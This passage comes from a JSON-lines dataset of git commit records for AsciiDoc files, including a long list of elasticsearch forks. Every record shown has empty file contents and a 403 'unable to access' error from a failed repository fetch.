kob\/elasticsearch,aglne\/elasticsearch,mnylen\/elasticsearch,rajanm\/elasticsearch,hydro2k\/elasticsearch,codebunt\/elasticsearch,thecocce\/elasticsearch,zkidkid\/elasticsearch,jsgao0\/elasticsearch,spiegela\/elasticsearch,bestwpw\/elasticsearch,gfyoung\/elasticsearch,winstonewert\/elasticsearch,janmejay\/elasticsearch,huanzhong\/elasticsearch,overcome\/elasticsearch,chirilo\/elasticsearch,andrestc\/elasticsearch,ulkas\/elasticsearch,apepper\/elasticsearch,hafkensite\/elasticsearch,Clairebi\/ElasticsearchClone,yongminxia\/elasticsearch,Shepard1212\/elasticsearch,nezirus\/elasticsearch,sauravmondallive\/elasticsearch,jw0201\/elastic,Brijeshrpatel9\/elasticsearch,lmtwga\/elasticsearch,mgalushka\/elasticsearch,Chhunlong\/elasticsearch,elancom\/elasticsearch,mjason3\/elasticsearch,bestwpw\/elasticsearch,Chhunlong\/elasticsearch,ajhalani\/elasticsearch,acchen97\/elasticsearch,queirozfcom\/elasticsearch,andrestc\/elasticsearch,sreeramjayan\/elasticsearch,18098924759\/elasticsearch,milodky\/elasticsearch,polyfractal\/elasticsearch,jaynblue\/elasticsearch,ajhalani\/elasticsearch,pritishppai\/elasticsearch,masterweb121\/elasticsearch,beiske\/elasticsearch,kubum\/elasticsearch,javachengwc\/elasticsearch,nellicus\/elasticsearch,ImpressTV\/elasticsearch,sposam\/elasticsearch,glefloch\/elasticsearch,vietlq\/elasticsearch,henakamaMSFT\/elasticsearch,heng4fun\/elasticsearch,Flipkart\/elasticsearch,chirilo\/elasticsearch,Brijeshrpatel9\/elasticsearch,petmit\/elasticsearch,F0lha\/elasticsearch,khiraiwa\/elasticsearch,kaneshin\/elasticsearch,Asimov4\/elasticsearch,mohit\/elasticsearch,opendatasoft\/elasticsearch,beiske\/elasticsearch,hechunwen\/elasticsearch,andrejserafim\/elasticsearch,tahaemin\/elasticsearch,fforbeck\/elasticsearch,IanvsPoplicola\/elasticsearch,fooljohnny\/elasticsearch,mnylen\/elasticsearch,mjason3\/elasticsearch,ImpressTV\/elasticsearch,jeteve\/elasticsearch,dylan8902\/elasticsearch,girirajsharma\/elasticsearch,chirilo\/elasticsearch,truemped\/elasticsearch,tkssharma\/elasticsearch,slavau\/elasticsearch,chirilo\/elasticsearch,HarishAtGitHub\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,kunallimaye\/elasticsearch,jango2015\/elasticsearch,avikurapati\/elasticsearch,wenpos\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,pritishppai\/elasticsearch,Liziyao\/elasticsearch,strapdata\/elassandra5-rc,huanzhong\/elasticsearch,jbertouch\/elasticsearch,zeroctu\/elasticsearch,fekaputra\/elasticsearch,strapdata\/elassandra,Siddartha07\/elasticsearch,clintongormley\/elasticsearch,kkirsche\/elasticsearch,ydsakyclguozi\/elasticsearch,aglne\/elasticsearch,sdauletau\/elasticsearch,nellicus\/elasticsearch,obourgain\/elasticsearch,Microsoft\/elasticsearch,jimhooker2002\/elasticsearch,hydro2k\/elasticsearch,koxa29\/elasticsearch,amit-shar\/elasticsearch,jprante\/elasticsearch,hanswang\/elasticsearch,mm0\/elasticsearch,njlawton\/elasticsearch,obourgain\/elasticsearch,adrianbk\/elasticsearch,fekaputra\/elasticsearch,pranavraman\/elasticsearch,opendatasoft\/elasticsearch,peschlowp\/elasticsearch,vietlq\/elasticsearch,mapr\/elasticsearch,s1monw\/elasticsearch,rhoml\/elasticsearch,Kakakakakku\/elasticsearch,Kakakakakku\/elasticsearch,nellicus\/elasticsearch,ThalaivaStars\/OrgRepo1,kunallimaye\/elasticsearch,lzo\/elasticsearch-1,fforbeck\/elasticsearch,andrejserafim\/elasticsearch,karthikjaps\/elasticsearch,zhaocloud\/elasticsearch,fforbeck\/elasticsearch,mute\/elasticsearch,i-am-Nathan\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,bawse\/elasticsearch,artnowo\/elasticsearch,koxa29\/elasticsearch,a2lin\/elasticsearch,achow\/elasticsearch,ThalaivaStars\/OrgRepo1,lmtwga\/elasticsearch,kimimj\/elasticsearch,geidies\/elasticsearch,btiernay\/elasticsearch,camilojd\/elasticsearch,areek\/elasticsearch,iantruslove\/elasticsearch,F0lha\/elasticsearch,onegambler\/elasticsearch,kalburgimanjunath\/elasticsearch,andrestc\/elasticsearch,vingupta3\/elasticsearch,Liziyao\/elasticsearch,nknize\/elasticsearch,sposam\/elasticsearch,brwe\/elasticsearch,pritishppai\/elasticsearch,SergVro\/elasticsearch,alexkuk\/elasticsearch,naveenhooda2000\/elasticsearch,aglne\/elasticsearch,MisterAndersen\/elasticsearch,jango2015\/elasticsearch,rmuir\/elasticsearch,palecur\/elasticsearch,HarishAtGitHub\/elasticsearch,wbowling\/elasticsearch,slavau\/elasticsearch,Shepard1212\/elasticsearch,milodky\/elasticsearch,iacdingping\/elasticsearch,gmarz\/elasticsearch,palecur\/elasticsearch,hirdesh2008\/elasticsearch,AshishThakur\/elasticsearch,Microsoft\/elasticsearch,mmaracic\/elasticsearch,EasonYi\/elasticsearch,TonyChai24\/ESSource,andrejserafim\/elasticsearch,pablocastro\/elasticsearch,SergVro\/elasticsearch,fforbeck\/elasticsearch,girirajsharma\/elasticsearch,davidvgalbraith\/elasticsearch,alexbrasetvik\/elasticsearch,wenpos\/elasticsearch,wittyameta\/elasticsearch,hirdesh2008\/elasticsearch,obourgain\/elasticsearch,abibell\/elasticsearch,kimimj\/elasticsearch,shreejay\/elasticsearch,cnfire\/elasticsearch-1,franklanganke\/elasticsearch,nomoa\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,awislowski\/elasticsearch,petabytedata\/elasticsearch,phani546\/elasticsearch,NBSW\/elasticsearch,Shekharrajak\/elasticsearch,AndreKR\/elasticsearch,kenshin233\/elasticsearch,hirdesh2008\/elasticsearch,rlugojr\/elasticsearch,coding0011\/elasticsearch,ydsakyclguozi\/elasticsearch,trangvh\/elasticsearch,sscarduzio\/elasticsearch,combinatorist\/elasticsearch,luiseduardohdbackup\/elasticsearch,fred84\/elasticsearch,yuy168\/elasticsearch,onegambler\/elasticsearch,kubum\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,opendatasoft\/elasticsearch,umeshdangat\/elasticsearch,wbowling\/elasticsearch,Flipkart\/elasticsearch,skearns64\/elasticsearch,vrkansagara\/elasticsearch,drewr\/elasticsearch,ckclark\/elasticsearch,alexshadow007\/elasticsearch,tahaemin\/elasticsearch,zhaocloud\/elasticsearch,lmtwga\/elasticsearch,markharwood\/elasticsearch,fooljohnny\/elasticsearch,pritishppai\/elasticsearch,liweinan0423\/elasticsearch,bawse\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,pranavraman\/elasticsearch,jimhooker2002\/elasticsearch,brwe\/elasticsearch,mrorii\/elasticsearch,fred84\/elasticsearch,acchen97\/elasticsearch,18098924759\/elasticsearch,nrkkalyan\/elasticsearch,hechunwen\/elasticsearch,wimvds\/elasticsearch,nrkkalyan\/elasticsearch,kevinkluge\/elasticsearch,dpursehouse\/elasticsearch,fooljohnny\/elasticsearch,mrorii\/elasticsearch,chirilo\/elasticsearch,wbowling\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,hanst\/elasticsearch,xingguang2013\/elasticsearch,weipinghe\/elasticsearch,Liziyao\/elasticsearch,JackyMai\/elasticsearch,mbrukman\/elasticsearch,mute\/elasticsearch,vrkansagara\/elasticsearch,kunallimaye\/elasticsearch,HarishAtGitHub\/elasticsearch,ajhalani\/elasticsearch,AshishThakur\/elasticsearch,nezirus\/elasticsearch,jeteve\/elasticsearch,C-Bish\/elasticsearch,Shekharrajak\/elasticsearch,btiernay\/elasticsearch,kcompher\/elasticsearch,xingguang2013\/elasticsearch,lzo\/elasticsearch-1,MetSystem\/elasticsearch,scottsom\/elasticsearch,MichaelLiZhou\/elasticsearch,sneivandt\/elasticsearch,sreeramjayan\/elasticsearch,spiegela\/elasticsearch,zhiqinghuang\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rlugojr\/elasticsearch,SergVro\/elasticsearch,zhiqinghuang\/elasticsearch,gingerwizard\/elasticsearch,brwe\/elasticsearch,btiernay\/elasticsearch,dylan8902\/elasticsearch,strapdata\/elassandra-test,onegambler\/elasticsearch,szroland\/elasticsearch,markwalkom\/elasticsearch,alexshadow007\/elasticsearch,mgalushka\/elasticsearch,luiseduardohdbackup\/elasticsearch,uschindler\/elasticsearch,polyfractal\/elasticsearch,fekaputra\/elasticsearch,awislowski\/elasticsearch,yongminxia\/elasticsearch,coding0011\/elasticsearch,dylan8902\/elasticsearch,tebriel\/elasticsearch,yynil\/elasticsearch,yuy168\/elasticsearch,episerver\/elasticsearch,mm0\/elasticsearch,AndreKR\/elasticsearch,wangyuxue\/elasticsearch,martinstuga\/elasticsearch,kingaj\/elasticsearch,elancom\/elasticsearch,alexkuk\/elasticsearch,rento19962\/elasticsearch,xuzha\/elasticsearch,feiqitian\/elasticsearch,likaiwalkman\/elasticsearch,tebriel\/elasticsearch,kunallimaye\/elasticsearch,nezirus\/elasticsearch,18098924759\/elasticsearch,Collaborne\/elasticsearch,davidvgalbraith\/elasticsearch,infusionsoft\/elasticsearch,martinstuga\/elasticsearch,SergVro\/elasticsearch,LeoYao\/elasticsearch,jchampion\/elasticsearch,ricardocerq\/elasticsearch,socialrank\/elasticsearch,wayeast\/elasticsearch,drewr\/elasticsearch,Ansh90\/elasticsearch,nomoa\/elasticsearch,LewayneNaidoo\/elasticsearch,jchampion\/elasticsearch,kingaj\/elasticsearch,pablocastro\/elasticsearch,vroyer\/elasticassandra,infusionsoft\/elasticsearch,tkssharma\/elasticsearch,zhaocloud\/elasticsearch,weipinghe\/elasticsearch,myelin\/elasticsearch,hydro2k\/elasticsearch,koxa29\/elasticsearch,fernandozhu\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,coding0011\/elasticsearch,Ansh90\/elasticsearch,mute\/elasticsearch,ckclark\/elasticsearch,LeoYao\/elasticsearch,VukDukic\/elasticsearch,mgalushka\/elasticsearch,skearns64\/elasticsearch,nellicus\/elasticsearch,chirilo\/elasticsearch,dataduke\/elasticsearch,sarwarbhuiyan\/elasticsearch,yanjunh\/elasticsearch,Uiho\/elasticsearch,rento19962\/elasticsearch,obourgain\/elasticsearch,slavau\/elasticsearch,yynil\/elasticsearch,Widen\/elasticsearch,mcku\/elasticsearch,Clairebi\/ElasticsearchClone,Uiho\/elasticsearch,spiegela\/elasticsearch,Clairebi\/ElasticsearchClone,areek\/elasticsearch,fforbeck\/elasticsearch,springning\/elasticsearch,anti-social\/elasticsearch,strapdata\/elassandra,mnylen\/elasticsearch,JervyShi\/elasticsearch,ZTE-PaaS\/elasticsearch,mikemccand\/elasticsearch,petabytedata\/elasticsearch,kenshin233\/elasticsearch,awislowski\/elasticsearch,ulkas\/elasticsearch,golubev\/elasticsearch,ImpressTV\/elasticsearch,socialrank\/elasticsearch,lightslife\/elasticsearch,wayeast\/elasticsearch,alexbrasetvik\/elasticsearch,sarwarbhuiyan\/elasticsearch,sarwarbhuiyan\/elasticsearch,ThalaivaStars\/OrgRepo1,kcompher\/elasticsearch,sauravmondallive\/elasticsearch,overcome\/elasticsearch,mute\/elasticsearch,combinatorist\/elasticsearch,knight1128\/elasticsearch,fred84\/elasticsearch,janmejay\/elasticsearch,andrestc\/elasticsearch,wangtuo\/elasticsearch,NBSW\/elasticsearch,Shepard1212\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,VukDukic\/elasticsearch,tsohil\/elasticsearch,Fsero\/elasticsearch,scottsom\/elasticsearch,markllama\/elasticsearch,mute\/elasticsearch,golubev\/elasticsearch,kalimatas\/elasticsearch,sscarduzio\/elasticsearch,abhijitiitr\/es,polyfractal\/elasticsearch,codebunt\/elasticsearch,ESamir\/elasticsearch,hanswang\/elasticsearch,andrestc\/elasticsearch,sjohnr\/elasticsearch,smflorentino\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra5-rc,chrismwendt\/elasticsearch,dataduke\/elasticsearch,JervyShi\/elasticsearch,wayeast\/elasticsearch,dataduke\/elasticsearch,jw0201\/elastic,Clairebi\/ElasticsearchClone,sscarduzio\/elasticsearch,tcucchietti\/elasticsearch,sposam\/elasticsearch,trangvh\/elasticsearch,smflorentino\/elasticsearch,tsohil\/elasticsearch,pritishppai\/elasticsearch,schonfeld\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Microsoft\/elasticsearch,Ansh90\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,kimimj\/elasticsearch,fooljohnny\/elasticsearch,hechunwen\/elasticsearch,s1monw\/elasticsearch,jbertouch\/elasticsearch,snikch\/elasticsearch,Collaborne\/elasticsearch,fekaputra\/elasticsearch,jbertouch\/elasticsearch,AshishThakur\/elasticsearch,iacdingping\/elasticsearch,thecocce\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,hanst\/elasticsearch,kalburgimanjunath\/elasticsearch,mm0\/elasticsearch,yanjunh\/elasticsearch,Siddartha07\/elasticsearch,xuzha\/elasticsearch,kimimj\/elasticsearch,tsohil\/elasticsearch,lchennup\/elasticsearch,vvcephei\/elasticsearch,tsohil\/elasticsearch,smflorentino\/elasticsearch,masterweb121\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,zkidkid\/elasticsearch,njlawton\/elasticsearch,rmuir\/elasticsearch,wayeast\/elasticsearch,elancom\/elasticsearch,vvcephei\/elasticsearch,szroland\/elasticsearch,mapr\/elasticsearch,episerver\/elasticsearch,javachengwc\/elasticsearch,iantruslove\/elasticsearch,lzo\/elasticsearch-1,wuranbo\/elasticsearch,knight1128\/elasticsearch,YosuaMichael\/elasticsearch,myelin\/elasticsearch,opendatasoft\/elasticsearch,tebriel\/elasticsearch,btiernay\/elasticsearch,kalburgimanjunath\/elasticsearch,tkssharma\/elasticsearch,NBSW\/elasticsearch,humandb\/elasticsearch,springning\/elasticsearch,mgalushka\/elasticsearch,knight1128\/elasticsearch,xpandan\/elasticsearch,javachengwc\/elasticsearch,wittyameta\/elasticsearch,mortonsykes\/elasticsearch,sauravmondallive\/elasticsearch,Kakakakakku\/elasticsearch,socialrank\/elasticsearch,aglne\/elasticsearch,Fsero\/elasticsearch,ESamir\/elasticsearch,glefloch\/elasticsearch,truemped\/elasticsearch,janmejay\/elasticsearch,adrianbk\/elasticsearch,spiegela\/elasticsearch,EasonYi\/elasticsearch,episerver\/elasticsearch,vvcephei\/elasticsearch,karthikjaps\/elasticsearch,himanshuag\/elasticsearch,xpandan\/elasticsearch,yuy168\/elasticsearch,palecur\/elasticsearch,Collaborne\/elasticsearch,linglaiyao1314\/elasticsearch,AleksKochev\/elasticsearch,iantruslove\/elasticsearch,sauravmondallive\/elasticsearch,scorpionvicky\/elasticsearch,kunallimaye\/elasticsearch,queirozfcom\/elasticsearch,huypx1292\/elasticsearch,xuzha\/elasticsearch,slavau\/elasticsearch,btiernay\/elasticsearch,jeteve\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,hirdesh2008\/elasticsearch,winstonewert\/elasticsearch,markharwood\/elasticsearch,linglaiyao1314\/elasticsearch,Widen\/elasticsearch,easonC\/elasticsearch,henakamaMSFT\/elasticsearch,vietlq\/elasticsearch,ydsakyclguozi\/elasticsearch,apepper\/elasticsearch,sarwarbhuiyan\/elasticsearch,robin13\/elasticsearch,schonfeld\/elasticsearch,lydonchandra\/elasticsearch,sreeramjayan\/elasticsearch,overcome\/elasticsearch,iantruslove\/elasticsearch,JackyMai\/elasticsearch,VukDukic\/elasticsearch,andrestc\/elasticsearch,HonzaKral\/elasticsearch,tcucchietti\/elasticsearch,petmit\/elasticsearch,JackyMai\/elasticsearch,mortonsykes\/elasticsearch,kimimj\/elasticsearch,dantuffery\/elasticsearch,mkis-\/elasticsearch,Uiho\/elasticsearch,masterweb121\/elasticsearch,IanvsPoplicola\/elasticsearch,Charlesdong\/elasticsearch,easonC\/elasticsearch,ivansun1010\/elasticsearch,fekaputra\/elasticsearch,vingupta3\/elasticsearch,elasticdog\/elasticsearch,mcku\/elasticsearch,kevinkluge\/elasticsearch","old_file":"docs\/reference\/search\/aggregations.asciidoc","new_file":"docs\/reference\/search\/aggregations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb30ba57145ad7fbc2bacf4b5d9ede9fc6cfe550","subject":"Added brief README","message":"Added brief README\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49a338c72c838e51cf16195088ca2924de3e5bca","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a55811f980acf877ec9f8e7215e773b6f516e65","subject":"Create 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","message":"Create 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83c2a4839b9a56defab4df713c937180d22c8013","subject":"Add Clojure\/north 2020","message":"Add Clojure\/north 2020","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/clojurenorth.adoc","new_file":"content\/events\/2020\/clojurenorth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2f4ba7051d794e3dc479c71572c65d7629420e13","subject":"Added some documentation.","message":"Added some documentation.\n","repos":"apache\/flex-blazeds","old_file":"opt\/blazeds-spring-boot-starter\/README.adoc","new_file":"opt\/blazeds-spring-boot-starter\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/flex-blazeds.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b6877948c208de299e79d4f86533cbf634a772f","subject":"Update 2013-10-15-Wolf-and-hunter.adoc","message":"Update 2013-10-15-Wolf-and-hunter.adoc","repos":"arseniuss\/blog.arseniuss.id.lv,arseniuss\/blog.arseniuss.id.lv,arseniuss\/blog.arseniuss.id.lv,arseniuss\/blog.arseniuss.id.lv","old_file":"_posts\/2013-10-15-Wolf-and-hunter.adoc","new_file":"_posts\/2013-10-15-Wolf-and-hunter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arseniuss\/blog.arseniuss.id.lv.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ee19db9a15498a5c84037b05a57389f4dd3f24d","subject":"Update 2016-07-16-Mi-segundo-blog.adoc","message":"Update 2016-07-16-Mi-segundo-blog.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2016-07-16-Mi-segundo-blog.adoc","new_file":"_posts\/2016-07-16-Mi-segundo-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b915c6f23910660c165d1361048138292cdc32d9","subject":"Update 2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","message":"Update 2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","new_file":"_posts\/2015-10-27-Episode-27-If-It-Walks-Like-A-Duck-Its-Pinball.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7001b0692d91e137db20d04ffefdd5f4db65cd56","subject":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","message":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2933075871bcde3fa6c422942467064dd82c0c4","subject":"Common Snippet App engine deploy","message":"Common Snippet App engine deploy\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-appenginedeploy.adoc","new_file":"src\/main\/docs\/common-appenginedeploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"59a022431b8de10faf2ec7947db1d8493d74e3f3","subject":"Add 1.1 Dresden release announcement","message":"Add 1.1 Dresden release announcement\n","repos":"raelik\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin","old_file":"docs\/news\/2015-09-18-jruby-gradle-1-1.adoc","new_file":"docs\/news\/2015-09-18-jruby-gradle-1-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raelik\/jruby-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd37de6a43b5451709502be38ac2d34aa31cc5e3","subject":"Publish 2016-6-26-PHRER-array-merge.adoc","message":"Publish 2016-6-26-PHRER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHRER-array-merge.adoc","new_file":"2016-6-26-PHRER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"885d90ca564852ff30560edb565cc686c34ef3ec","subject":"Update 2017-02-14-Hey-this-is-my-blog.adoc","message":"Update 2017-02-14-Hey-this-is-my-blog.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Hey-this-is-my-blog.adoc","new_file":"_posts\/2017-02-14-Hey-this-is-my-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932db6c966514440e142328ae32a6d46ba178159","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82b17cc95e65973348065499235885cff0cf4648","subject":"Update 2019-08-18-The-Ideal-Situation.adoc","message":"Update 2019-08-18-The-Ideal-Situation.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-08-18-The-Ideal-Situation.adoc","new_file":"_posts\/2019-08-18-The-Ideal-Situation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf06a57e91d22e1789bd4ebc597c1474a2d2c19","subject":"Update 2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","message":"Update 2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","new_file":"_posts\/2015-10-12-DIY-Origins-of-the-Luftwaffe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fc0e8787666a10eecbc66344516b5bf4c4ccfc6","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a03593d5deb3dded464de94176447b6943826f62","subject":"Update 2017-09-10-nativescript-and-wordpress-rest-api.adoc","message":"Update 2017-09-10-nativescript-and-wordpress-rest-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-10-nativescript-and-wordpress-rest-api.adoc","new_file":"_posts\/2017-09-10-nativescript-and-wordpress-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f82dc0029c03cab5c90dcdb0f5375fa8f566a009","subject":"Update 2016-02-02-Next-idea.adoc","message":"Update 2016-02-02-Next-idea.adoc","repos":"alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io,alexbleasdale\/alexbleasdale.github.io","old_file":"_posts\/2016-02-02-Next-idea.adoc","new_file":"_posts\/2016-02-02-Next-idea.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexbleasdale\/alexbleasdale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e437aacd86691c929ffb1fddfbea891f7c0cc25","subject":"Create Kill-Bill-Glossary.adoc","message":"Create Kill-Bill-Glossary.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/glossary\/Kill-Bill-Glossary.adoc","new_file":"userguide\/glossary\/Kill-Bill-Glossary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f4a1748d0d3cd747b99ca52918dee41ce7a192c","subject":"Update 2016-07-03-Test-Post.adoc","message":"Update 